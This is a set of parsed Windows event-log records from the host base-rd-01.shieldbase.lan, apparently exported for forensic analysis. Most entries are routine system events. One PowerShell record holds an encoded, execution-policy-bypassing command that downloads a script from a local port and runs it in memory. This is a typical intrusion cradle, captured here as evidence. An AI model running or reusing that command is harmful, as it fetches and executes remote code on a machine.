{"ChunkNumber":16,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Reason\",\"#text\":\"4\"},{\"@Name\":\"Status\",\"#text\":\"3221225653\"},{\"@Name\":\"ServerNameLength\",\"#text\":\"9\"},{\"@Name\":\"ServerName\",\"#text\":\"base-file\"},{\"@Name\":\"AddressLength\",\"#text\":\"16\"},{\"@Name\":\"RemoteAddress\",\"#text\":\"02-00-01-BD-0A-0A-04-05-00-00-00-00-00-00-00-00\"},{\"@Name\":\"LocalAddress\",\"#text\":\"02-00-00-00-AC-10-06-0B-00-00-00-00-00-00-00-00\"},{\"@Name\":\"InstanceNameLength\",\"#text\":\"24\"},{\"@Name\":\"InstanceName\",\"#text\":\"\\\\Device\\\\LanmanRedirector\"},{\"@Name\":\"ConnectionType\",\"#text\":\"1\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-SmbClient/Connectivity","Provider":"Microsoft-Windows-SMBClient","EventId":30822,"EventRecordId":"2073","ProcessId":4,"ThreadId":692,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-SmbClient%4Connectivity.evtx","TimeCreated":"2018-07-12T23:59:40.0277981+00:00","RecordNumber":2073}
{"ChunkNumber":50,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"operationName\",\"#text\":\"Enumeration\"},{\"@Name\":\"resourceUri\",\"#text\":\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-WinRM/Operational","Provider":"Microsoft-Windows-WinRM","EventId":145,"EventRecordId":"272916","ProcessId":556,"ThreadId":348,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WinRM%4Operational.evtx","TimeCreated":"2018-09-01T13:41:54.2389287+00:00","RecordNumber":272916}
{"ChunkNumber":5,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Event\",\"#text\":\"0\"},{\"@Name\":\"SubscriberName\",\"#text\":\"TermSrv\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Winlogon/Operational","Provider":"Microsoft-Windows-Winlogon","EventId":811,"EventRecordId":"857","ProcessId":5068,"ThreadId":11744,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Winlogon%4Operational.evtx","TimeCreated":"2018-07-18T15:05:24.9647569+00:00","RecordNumber":857}
{"PayloadData1":"Path: ","PayloadData2":"ScriptBlockText: Set-Alias -Name scim -Value Set-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue","MapDescription":"Contains contents of scripts run","ChunkNumber":232,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"MessageNumber\",\"#text\":\"1\"},{\"@Name\":\"MessageTotal\",\"#text\":\"1\"},{\"@Name\":\"ScriptBlockText\",\"#text\":\"Set-Alias -Name scim -Value Set-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue\"},{\"@Name\":\"ScriptBlockId\",\"#text\":\"f42c3973-ad15-464d-9c3d-65db9136ba32\"},{\"@Name\":\"Path\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1183","Channel":"Microsoft-Windows-PowerShell/Operational","Provider":"Microsoft-Windows-PowerShell","EventId":4104,"EventRecordId":"10389","ProcessId":15464,"ThreadId":10880,"Level":5,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-PowerShell%4Operational.evtx","TimeCreated":"2018-08-28T20:00:03.6640008+00:00","RecordNumber":10389}
{"PayloadData1":"Target: NT AUTHORITY\\SYSTEM","PayloadData2":"LogonType 5","UserName":"shieldbase\\BASE-RD-01$","RemoteHost":"- (-)","ExecutableInfo":"C:\\Windows\\System32\\services.exe","MapDescription":"Successful logon","ChunkNumber":601,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"TargetUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"TargetUserName\",\"#text\":\"SYSTEM\"},{\"@Name\":\"TargetDomainName\",\"#text\":\"NT AUTHORITY\"},{\"@Name\":\"TargetLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"LogonType\",\"#text\":\"5\"},{\"@Name\":\"LogonProcessName\",\"#text\":\"Advapi  \"},{\"@Name\":\"AuthenticationPackageName\",\"#text\":\"Negotiate\"},{\"@Name\":\"WorkstationName\",\"#text\":\"-\"},{\"@Name\":\"LogonGuid\",\"#text\":\"00000000-0000-0000-0000-000000000000\"},{\"@Name\":\"TransmittedServices\",\"#text\":\"-\"},{\"@Name\":\"LmPackageName\",\"#text\":\"-\"},{\"@Name\":\"KeyLength\",\"#text\":\"0\"},{\"@Name\":\"ProcessId\",\"#text\":\"0x2E4\"},{\"@Name\":\"ProcessName\",\"#text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"@Name\":\"IpAddress\",\"#text\":\"-\"},{\"@Name\":\"IpPort\",\"#text\":\"-\"},{\"@Name\":\"ImpersonationLevel\",\"#text\":\"%%1833\"},{\"@Name\":\"RestrictedAdminMode\",\"#text\":\"-\"},{\"@Name\":\"TargetOutboundUserName\",\"#text\":\"-\"},{\"@Name\":\"TargetOutboundDomainName\",\"#text\":\"-\"},{\"@Name\":\"VirtualAccount\",\"#text\":\"%%1843\"},{\"@Name\":\"TargetLinkedLogonId\",\"#text\":\"0x0\"},{\"@Name\":\"ElevatedToken\",\"#text\":\"%%1842\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4624,"EventRecordId":"53901","ProcessId":772,"ThreadId":3856,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-09-04T09:30:44.5912791+00:00","RecordNumber":53901}
{"ChunkNumber":55,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"5797","ProcessId":624,"ThreadId":3116,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-09T22:03:30.0393026+00:00","RecordNumber":5797}
{"ChunkNumber":149,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"[0f10] [000001FDF21247D0:53466E60-4DA9-D32B-D0C1-E0686457D28F] StartProcessing: Key:Valid\"},{\"@Name\":\"Function\",\"#text\":\"StateMachine<class KeyMachine,class KeyState>::PumpEvents\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\lib\\\\statemachine.h\"},{\"@Name\":\"Line Number\",\"#text\":\"154\"}]}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"266509","ProcessId":692,"ThreadId":3856,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-05T11:53:54.4978181+00:00","RecordNumber":266509}
{"ChunkNumber":9,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"hrError\",\"#text\":\"0x80070002\"},{\"@Name\":\"FolderId\",\"#text\":\"c5abbf53-e17f-4121-8900-86626fc2c973\"},{\"@Name\":\"Path\",\"#text\":\"C:\\\\WINDOWS\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Network Shortcuts\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Known Folders API Service","Provider":"Microsoft-Windows-KnownFolders","EventId":1002,"EventRecordId":"19725","ProcessId":1484,"ThreadId":2408,"Level":3,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Known Folders API Service.evtx","TimeCreated":"2018-08-22T22:33:55.1176320+00:00","RecordNumber":19725}
{"ChunkNumber":10,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":\"\"}","UserId":"S-1-5-18","Channel":"Microsoft-Client-Licensing-Platform/Admin","Provider":"Microsoft-Client-Licensing-Platform","EventId":102,"EventRecordId":"8973","ProcessId":6096,"ThreadId":752,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx","TimeCreated":"2018-08-30T21:44:02.4714107+00:00","RecordNumber":8973}
{"ChunkNumber":53,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"DescriptionString\",\"#text\":\"Local Group Policy, Not Applied (Empty), \"},{\"@Name\":\"GPOInfoList\",\"#text\":\"<GPO ID=\\\"Local Group Policy\\\"><Name>Local Group Policy</Name><Version>0</Version><SOM>Local</SOM><FSPath>C:\\\\WINDOWS\\\\System32\\\\GroupPolicy\\\\Machine</FSPath><Reason>NOTAPPLIED-EMPTY</Reason></GPO>\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-GroupPolicy/Operational","Provider":"Microsoft-Windows-GroupPolicy","EventId":5313,"EventRecordId":"153527","ProcessId":556,"ThreadId":10692,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx","TimeCreated":"2018-09-04T01:10:52.2011896+00:00","RecordNumber":153527}
{"ChunkNumber":3,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Operation\",\"#text\":\"Service started\"},{\"@Name\":\"Details\",\"#text\":\"The service will auto stop if no requests received for some period of time.\"},{\"@Name\":\"Status\",\"#text\":\"0x0\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-LiveId/Operational","Provider":"Microsoft-Windows-LiveId","EventId":2024,"EventRecordId":"43354","ProcessId":648,"ThreadId":2552,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-LiveId%4Operational.evtx","TimeCreated":"2018-09-06T20:36:06.0734995+00:00","RecordNumber":43354}
{"ChunkNumber":0,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"DeviceGUID\",\"#text\":\"7e1622a0-5739-11e8-a8fc-806e6f6e6963\"},{\"@Name\":\"DeviceNumber\",\"#text\":\"0\"},{\"@Name\":\"Vendor\",\"#text\":\"VMware  \"},{\"@Name\":\"Model\",\"#text\":\"Virtual disk    \"},{\"@Name\":\"FirmwareVersion\",\"#text\":\"1.0 \"},{\"@Name\":\"SerialNumber\",\"#text\":\"NULL\"},{\"@Name\":\"IrpStatus\",\"#text\":\"0xC0000185\"},{\"@Name\":\"IoctlControlCode\",\"#text\":\"0x74080\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Storage-ClassPnP/Operational","Provider":"Microsoft-Windows-StorDiag","EventId":504,"EventRecordId":"66","ProcessId":2676,"ThreadId":4252,"Level":2,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Storage-ClassPnP%4Operational.evtx","TimeCreated":"2018-05-18T05:00:30.1338054+00:00","RecordNumber":66}
{"ChunkNumber":0,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"Prop_ContainerId\",\"#text\":\"{ECC1E499-5EFD-039D-5887-23C2BD87E9A7}\"}}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-DeviceSetupManager/Operational","Provider":"Microsoft-Windows-DeviceSetupManager","EventId":300,"EventRecordId":"73","ProcessId":8,"ThreadId":10868,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx","TimeCreated":"2018-07-11T05:42:41.7985704+00:00","RecordNumber":73}
{"ChunkNumber":108,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"0, WindowsUpdateFailure3, Not available, 0, 10.0.16299.522, 8024000b, B56983B9-0E9A-43CF-91CE-82AB93868152, Download, 1, 0, 0, Update;taskhostw, {855E8A7C-ECB4-4CA3-B045-1DFA50104289}, 0, \\n\\\\\\\\?\\\\C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\Temp\\\\WER2DD6.tmp.WERInternalMetadata.xml, C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\NonCritical_10.0.16299.522_bfa851ad863780604d24cc9be2e5d0295a61fcd_00000000_776ac6be, 0, 80fa3bbe-ece4-4c1c-892e-b0559b6a164d, 524388\",\"Binary\":\"\"}}","Channel":"Application","Provider":"Windows Error Reporting","EventId":1001,"EventRecordId":"254584","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Application.evtx","TimeCreated":"2018-09-03T03:32:07.1039462+00:00","RecordNumber":254584}
{"ChunkNumber":4,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"FailureTime\",\"#text\":\"2018-08-06 19:28:45.3116586\"},{\"@Name\":\"StackHash\",\"#text\":\"0xF73EBCEB\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational","Provider":"Microsoft-Windows-Security-LessPrivilegedAppContainer","EventId":1,"EventRecordId":"615","ProcessId":3596,"ThreadId":5040,"Level":2,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Security-LessPrivilegedAppContainer%4Operational.evtx","TimeCreated":"2018-08-06T19:28:45.3116596+00:00","RecordNumber":615}
{"ChunkNumber":4,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"ProcessName\"},{\"@Name\":\"Type\",\"#text\":\"1\"},{\"@Name\":\"ErrorCode\",\"#text\":\"2147942403\"},{\"@Name\":\"File\",\"#text\":\"onecoreuap\\\\shell\\\\cloudstore\\\\store\\\\cache\\\\src\\\\cloudcacheinitializer.cpp\"},{\"@Name\":\"LineNumber\",\"#text\":\"178\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-CloudStore/Operational","Provider":"Microsoft-Windows-CloudStore","EventId":1,"EventRecordId":"2746","ProcessId":1484,"ThreadId":1580,"Level":2,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-CloudStore%4Operational.evtx","TimeCreated":"2018-08-14T18:39:37.9507761+00:00","RecordNumber":2746}
{"ChunkNumber":4,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"DeviceGUID\",\"#text\":\"bc74567b-99ad-11e8-a901-806e6f6e6963\"},{\"@Name\":\"DeviceNumber\",\"#text\":\"0\"},{\"@Name\":\"Vendor\",\"#text\":\"VMware  \"},{\"@Name\":\"Model\",\"#text\":\"Virtual disk    \"},{\"@Name\":\"FirmwareVersion\",\"#text\":\"1.0 \"},{\"@Name\":\"SerialNumber\",\"#text\":\"NULL\"},{\"@Name\":\"IrpStatus\",\"#text\":\"0xC0000185\"},{\"@Name\":\"IoctlControlCode\",\"#text\":\"0x74080\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Storage-ClassPnP/Operational","Provider":"Microsoft-Windows-StorDiag","EventId":504,"EventRecordId":"649","ProcessId":3048,"ThreadId":356,"Level":2,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Storage-ClassPnP%4Operational.evtx","TimeCreated":"2018-08-14T03:30:06.6573701+00:00","RecordNumber":649}
{"ChunkNumber":75,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"CreatedTaskProcess\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\sih\"},{\"@Name\":\"Path\",\"#text\":\"%systemroot%\\\\System32\\\\sihclient.exe\"},{\"@Name\":\"ProcessID\",\"#text\":\"10504\"},{\"@Name\":\"Priority\",\"#text\":\"16384\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":129,"EventRecordId":"190212","ProcessId":1484,"ThreadId":1580,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-08-24T18:01:41.1531519+00:00","RecordNumber":190212}
{"ChunkNumber":59,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"ContentId: DFBE09D0-1F22-A9C0-2D3D-3F4C6351E58F, cached FulfillmentData: {\\\"ProductId\\\":\\\"9WZDNCRD1HKW\\\",\\\"SkuId\\\":\\\"0010\\\",\\\"PackageFamilyName\\\":\\\"Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\\\",\\\"WuCategoryId\\\":\\\"9db724c9-966d-4aeb-9d3b-d6b2c77f3de3\\\"}\"},{\"@Name\":\"Function\",\"#text\":\"GetFulfillmentData\"},{\"@Name\":\"Error Code\",\"#text\":\"-1\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\installservice\\\\lib\\\\storeappinfo.cpp\"},{\"@Name\":\"Line Number\",\"#text\":\"445\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Install-Agent","EventId":2002,"EventRecordId":"258079","ProcessId":9104,"ThreadId":10792,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-04T03:01:28.2608929+00:00","RecordNumber":258079}
{"PayloadData1":"HostApplication=powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIANwAuADAALgAwAC4AMQA6ADQAMQA2ADEANAAvACcAKQApAA==","PayloadData2":"HostName=ConsoleHost","PayloadData3":"HostVersion=5.1.16299.547","MapDescription":"Engine state is changed from Available to Stopped.","ChunkNumber":504,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"Stopped, Available, \\tNewEngineState=Stopped\\n\\tPreviousEngineState=Available\\n\\n\\tSequenceNumber=31\\n\\n\\tHostName=ConsoleHost\\n\\tHostVersion=5.1.16299.547\\n\\tHostId=0e07f97e-96aa-4a3b-8f59-34b49b201104\\n\\tHostApplication=powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIANwAuADAALgAwAC4AMQA6ADQAMQA2ADEANAAvACcAKQApAA==\\n\\tEngineVersion=5.1.16299.547\\n\\tRunspaceId=db7d2211-c023-49c2-8021-379649a9cfd2\\n\\tPipelineId=\\n\\tCommandName=\\n\\tCommandType=\\n\\tScriptName=\\n\\tCommandPath=\\n\\tCommandLine=\",\"Binary\":\"\"}}","Channel":"Windows PowerShell","Provider":"PowerShell","EventId":403,"EventRecordId":"10622","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Windows PowerShell.evtx","TimeCreated":"2018-08-31T00:06:58.8615796+00:00","RecordNumber":10622}
{"ChunkNumber":0,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"InterfaceGuid\",\"#text\":\"c0b83799-cd6d-4ea6-8e37-5afba29408dc\"},{\"@Name\":\"MediaType\",\"#text\":\"1\"}]}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-Wcmsvc/Operational","Provider":"Microsoft-Windows-Wcmsvc","EventId":1010,"EventRecordId":"146","ProcessId":1668,"ThreadId":3060,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx","TimeCreated":"2018-05-11T17:12:44.9090717+00:00","RecordNumber":146}
{"ChunkNumber":17,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"2031","ProcessId":628,"ThreadId":672,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-08T15:36:15.2098498+00:00","RecordNumber":2031}
{"PayloadData1":"PID: 8376","PayloadData2":"Path: C:\\Windows\\System32\\wbem\\WmiPerfInst.dll","MapDescription":"WMI wmiprvse execution","ChunkNumber":98,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"UserData\":{\"Operation_StartedOperational\":{\"ProviderName\":\"WmiPerfInst\",\"Code\":\"0x0\",\"HostProcess\":\"wmiprvse.exe\",\"ProcessID\":\"8376\",\"ProviderPath\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPerfInst.dll\"}}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-WMI-Activity/Operational","Provider":"Microsoft-Windows-WMI-Activity","EventId":5857,"EventRecordId":"15801","ProcessId":8376,"ThreadId":4672,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx","TimeCreated":"2018-09-05T15:14:22.3058766+00:00","RecordNumber":15801}
{"ChunkNumber":9,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"User\",\"#text\":\"spsql\"},{\"@Name\":\"TaskId\",\"#text\":\"install::E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\"},{\"@Name\":\"TaskCount\",\"#text\":\"7\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-AppReadiness/Admin","Provider":"Microsoft-Windows-AppReadiness","EventId":240,"EventRecordId":"1186","ProcessId":372,"ThreadId":15696,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-AppReadiness%4Admin.evtx","TimeCreated":"2018-08-28T21:39:22.1235156+00:00","RecordNumber":1186}
{"ChunkNumber":127,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"State Machine\",\"#text\":\"0x1FDF2123830\"},{\"@Name\":\"Thread ID\",\"#text\":\"4028\"},{\"@Name\":\"State Machine Name\",\"#text\":\"Key:Valid\"},{\"@Name\":\"Current State\",\"#text\":\"Key:Invalid\"},{\"@Name\":\"New State\",\"#text\":\"0116DC02-781B-D1D1-FC1C-C80195511E17\"}]}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8012,"EventRecordId":"264437","ProcessId":692,"ThreadId":4028,"Level":5,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-05T04:02:00.6044856+00:00","RecordNumber":264437}
{"ChunkNumber":2,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"ConnectionType\",\"#text\":\"0\"},{\"@Name\":\"HostName\",\"#text\":\"172.16.4.10\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-PushNotification-Platform/Operational","Provider":"Microsoft-Windows-PushNotifications-Platform","EventId":1214,"EventRecordId":"177530","ProcessId":648,"ThreadId":2524,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-PushNotification-Platform%4Operational.evtx","TimeCreated":"2018-09-07T01:39:28.3634371+00:00","RecordNumber":177530}
{"ChunkNumber":251,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"TimeTriggerEvent\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\QueueReporting\"},{\"@Name\":\"InstanceId\",\"#text\":\"4d497709-8679-4f58-b83c-2a7bd22dbfcf\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":107,"EventRecordId":"209415","ProcessId":556,"ThreadId":9432,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-09-05T08:53:40.0466405+00:00","RecordNumber":209415}
{"PayloadData1":"Target: shieldbase\\tdungan","MapDescription":"The workstation was locked","ChunkNumber":509,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"TargetUserSid\",\"#text\":\"S-1-5-21-3445421715-2530590580-3149308974-1116\"},{\"@Name\":\"TargetUserName\",\"#text\":\"tdungan\"},{\"@Name\":\"TargetDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"TargetLogonId\",\"#text\":\"0x153003\"},{\"@Name\":\"SessionId\",\"#text\":\"1\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4800,"EventRecordId":"46922","ProcessId":776,"ThreadId":824,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-08-30T04:17:27.8991239+00:00","RecordNumber":46922}
{"ChunkNumber":186,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"[15e4] [000001FDF2123510:0116DC02-781B-D1D1-FC1C-C80195511E17] Dispatch       : Key:Initial <- Key:Activate\"},{\"@Name\":\"Function\",\"#text\":\"StateMachine<class KeyMachine,class KeyState>::PumpEvents\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\lib\\\\statemachine.h\"},{\"@Name\":\"Line Number\",\"#text\":\"162\"}]}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"269984","ProcessId":692,"ThreadId":5604,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-05T22:30:44.5123724+00:00","RecordNumber":269984}
{"ChunkNumber":16,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"operationName\",\"#text\":\"Enumeration\"},{\"@Name\":\"resourceUri\",\"#text\":\"http://schemas.microsoft.com/wbem/wsman/1/SubscriptionManager/Subscription\"}]}}","UserId":"S-1-5-20","Channel":"Microsoft-Windows-WinRM/Operational","Provider":"Microsoft-Windows-WinRM","EventId":145,"EventRecordId":"267882","ProcessId":1100,"ThreadId":1692,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WinRM%4Operational.evtx","TimeCreated":"2018-08-30T14:27:04.5570264+00:00","RecordNumber":267882}
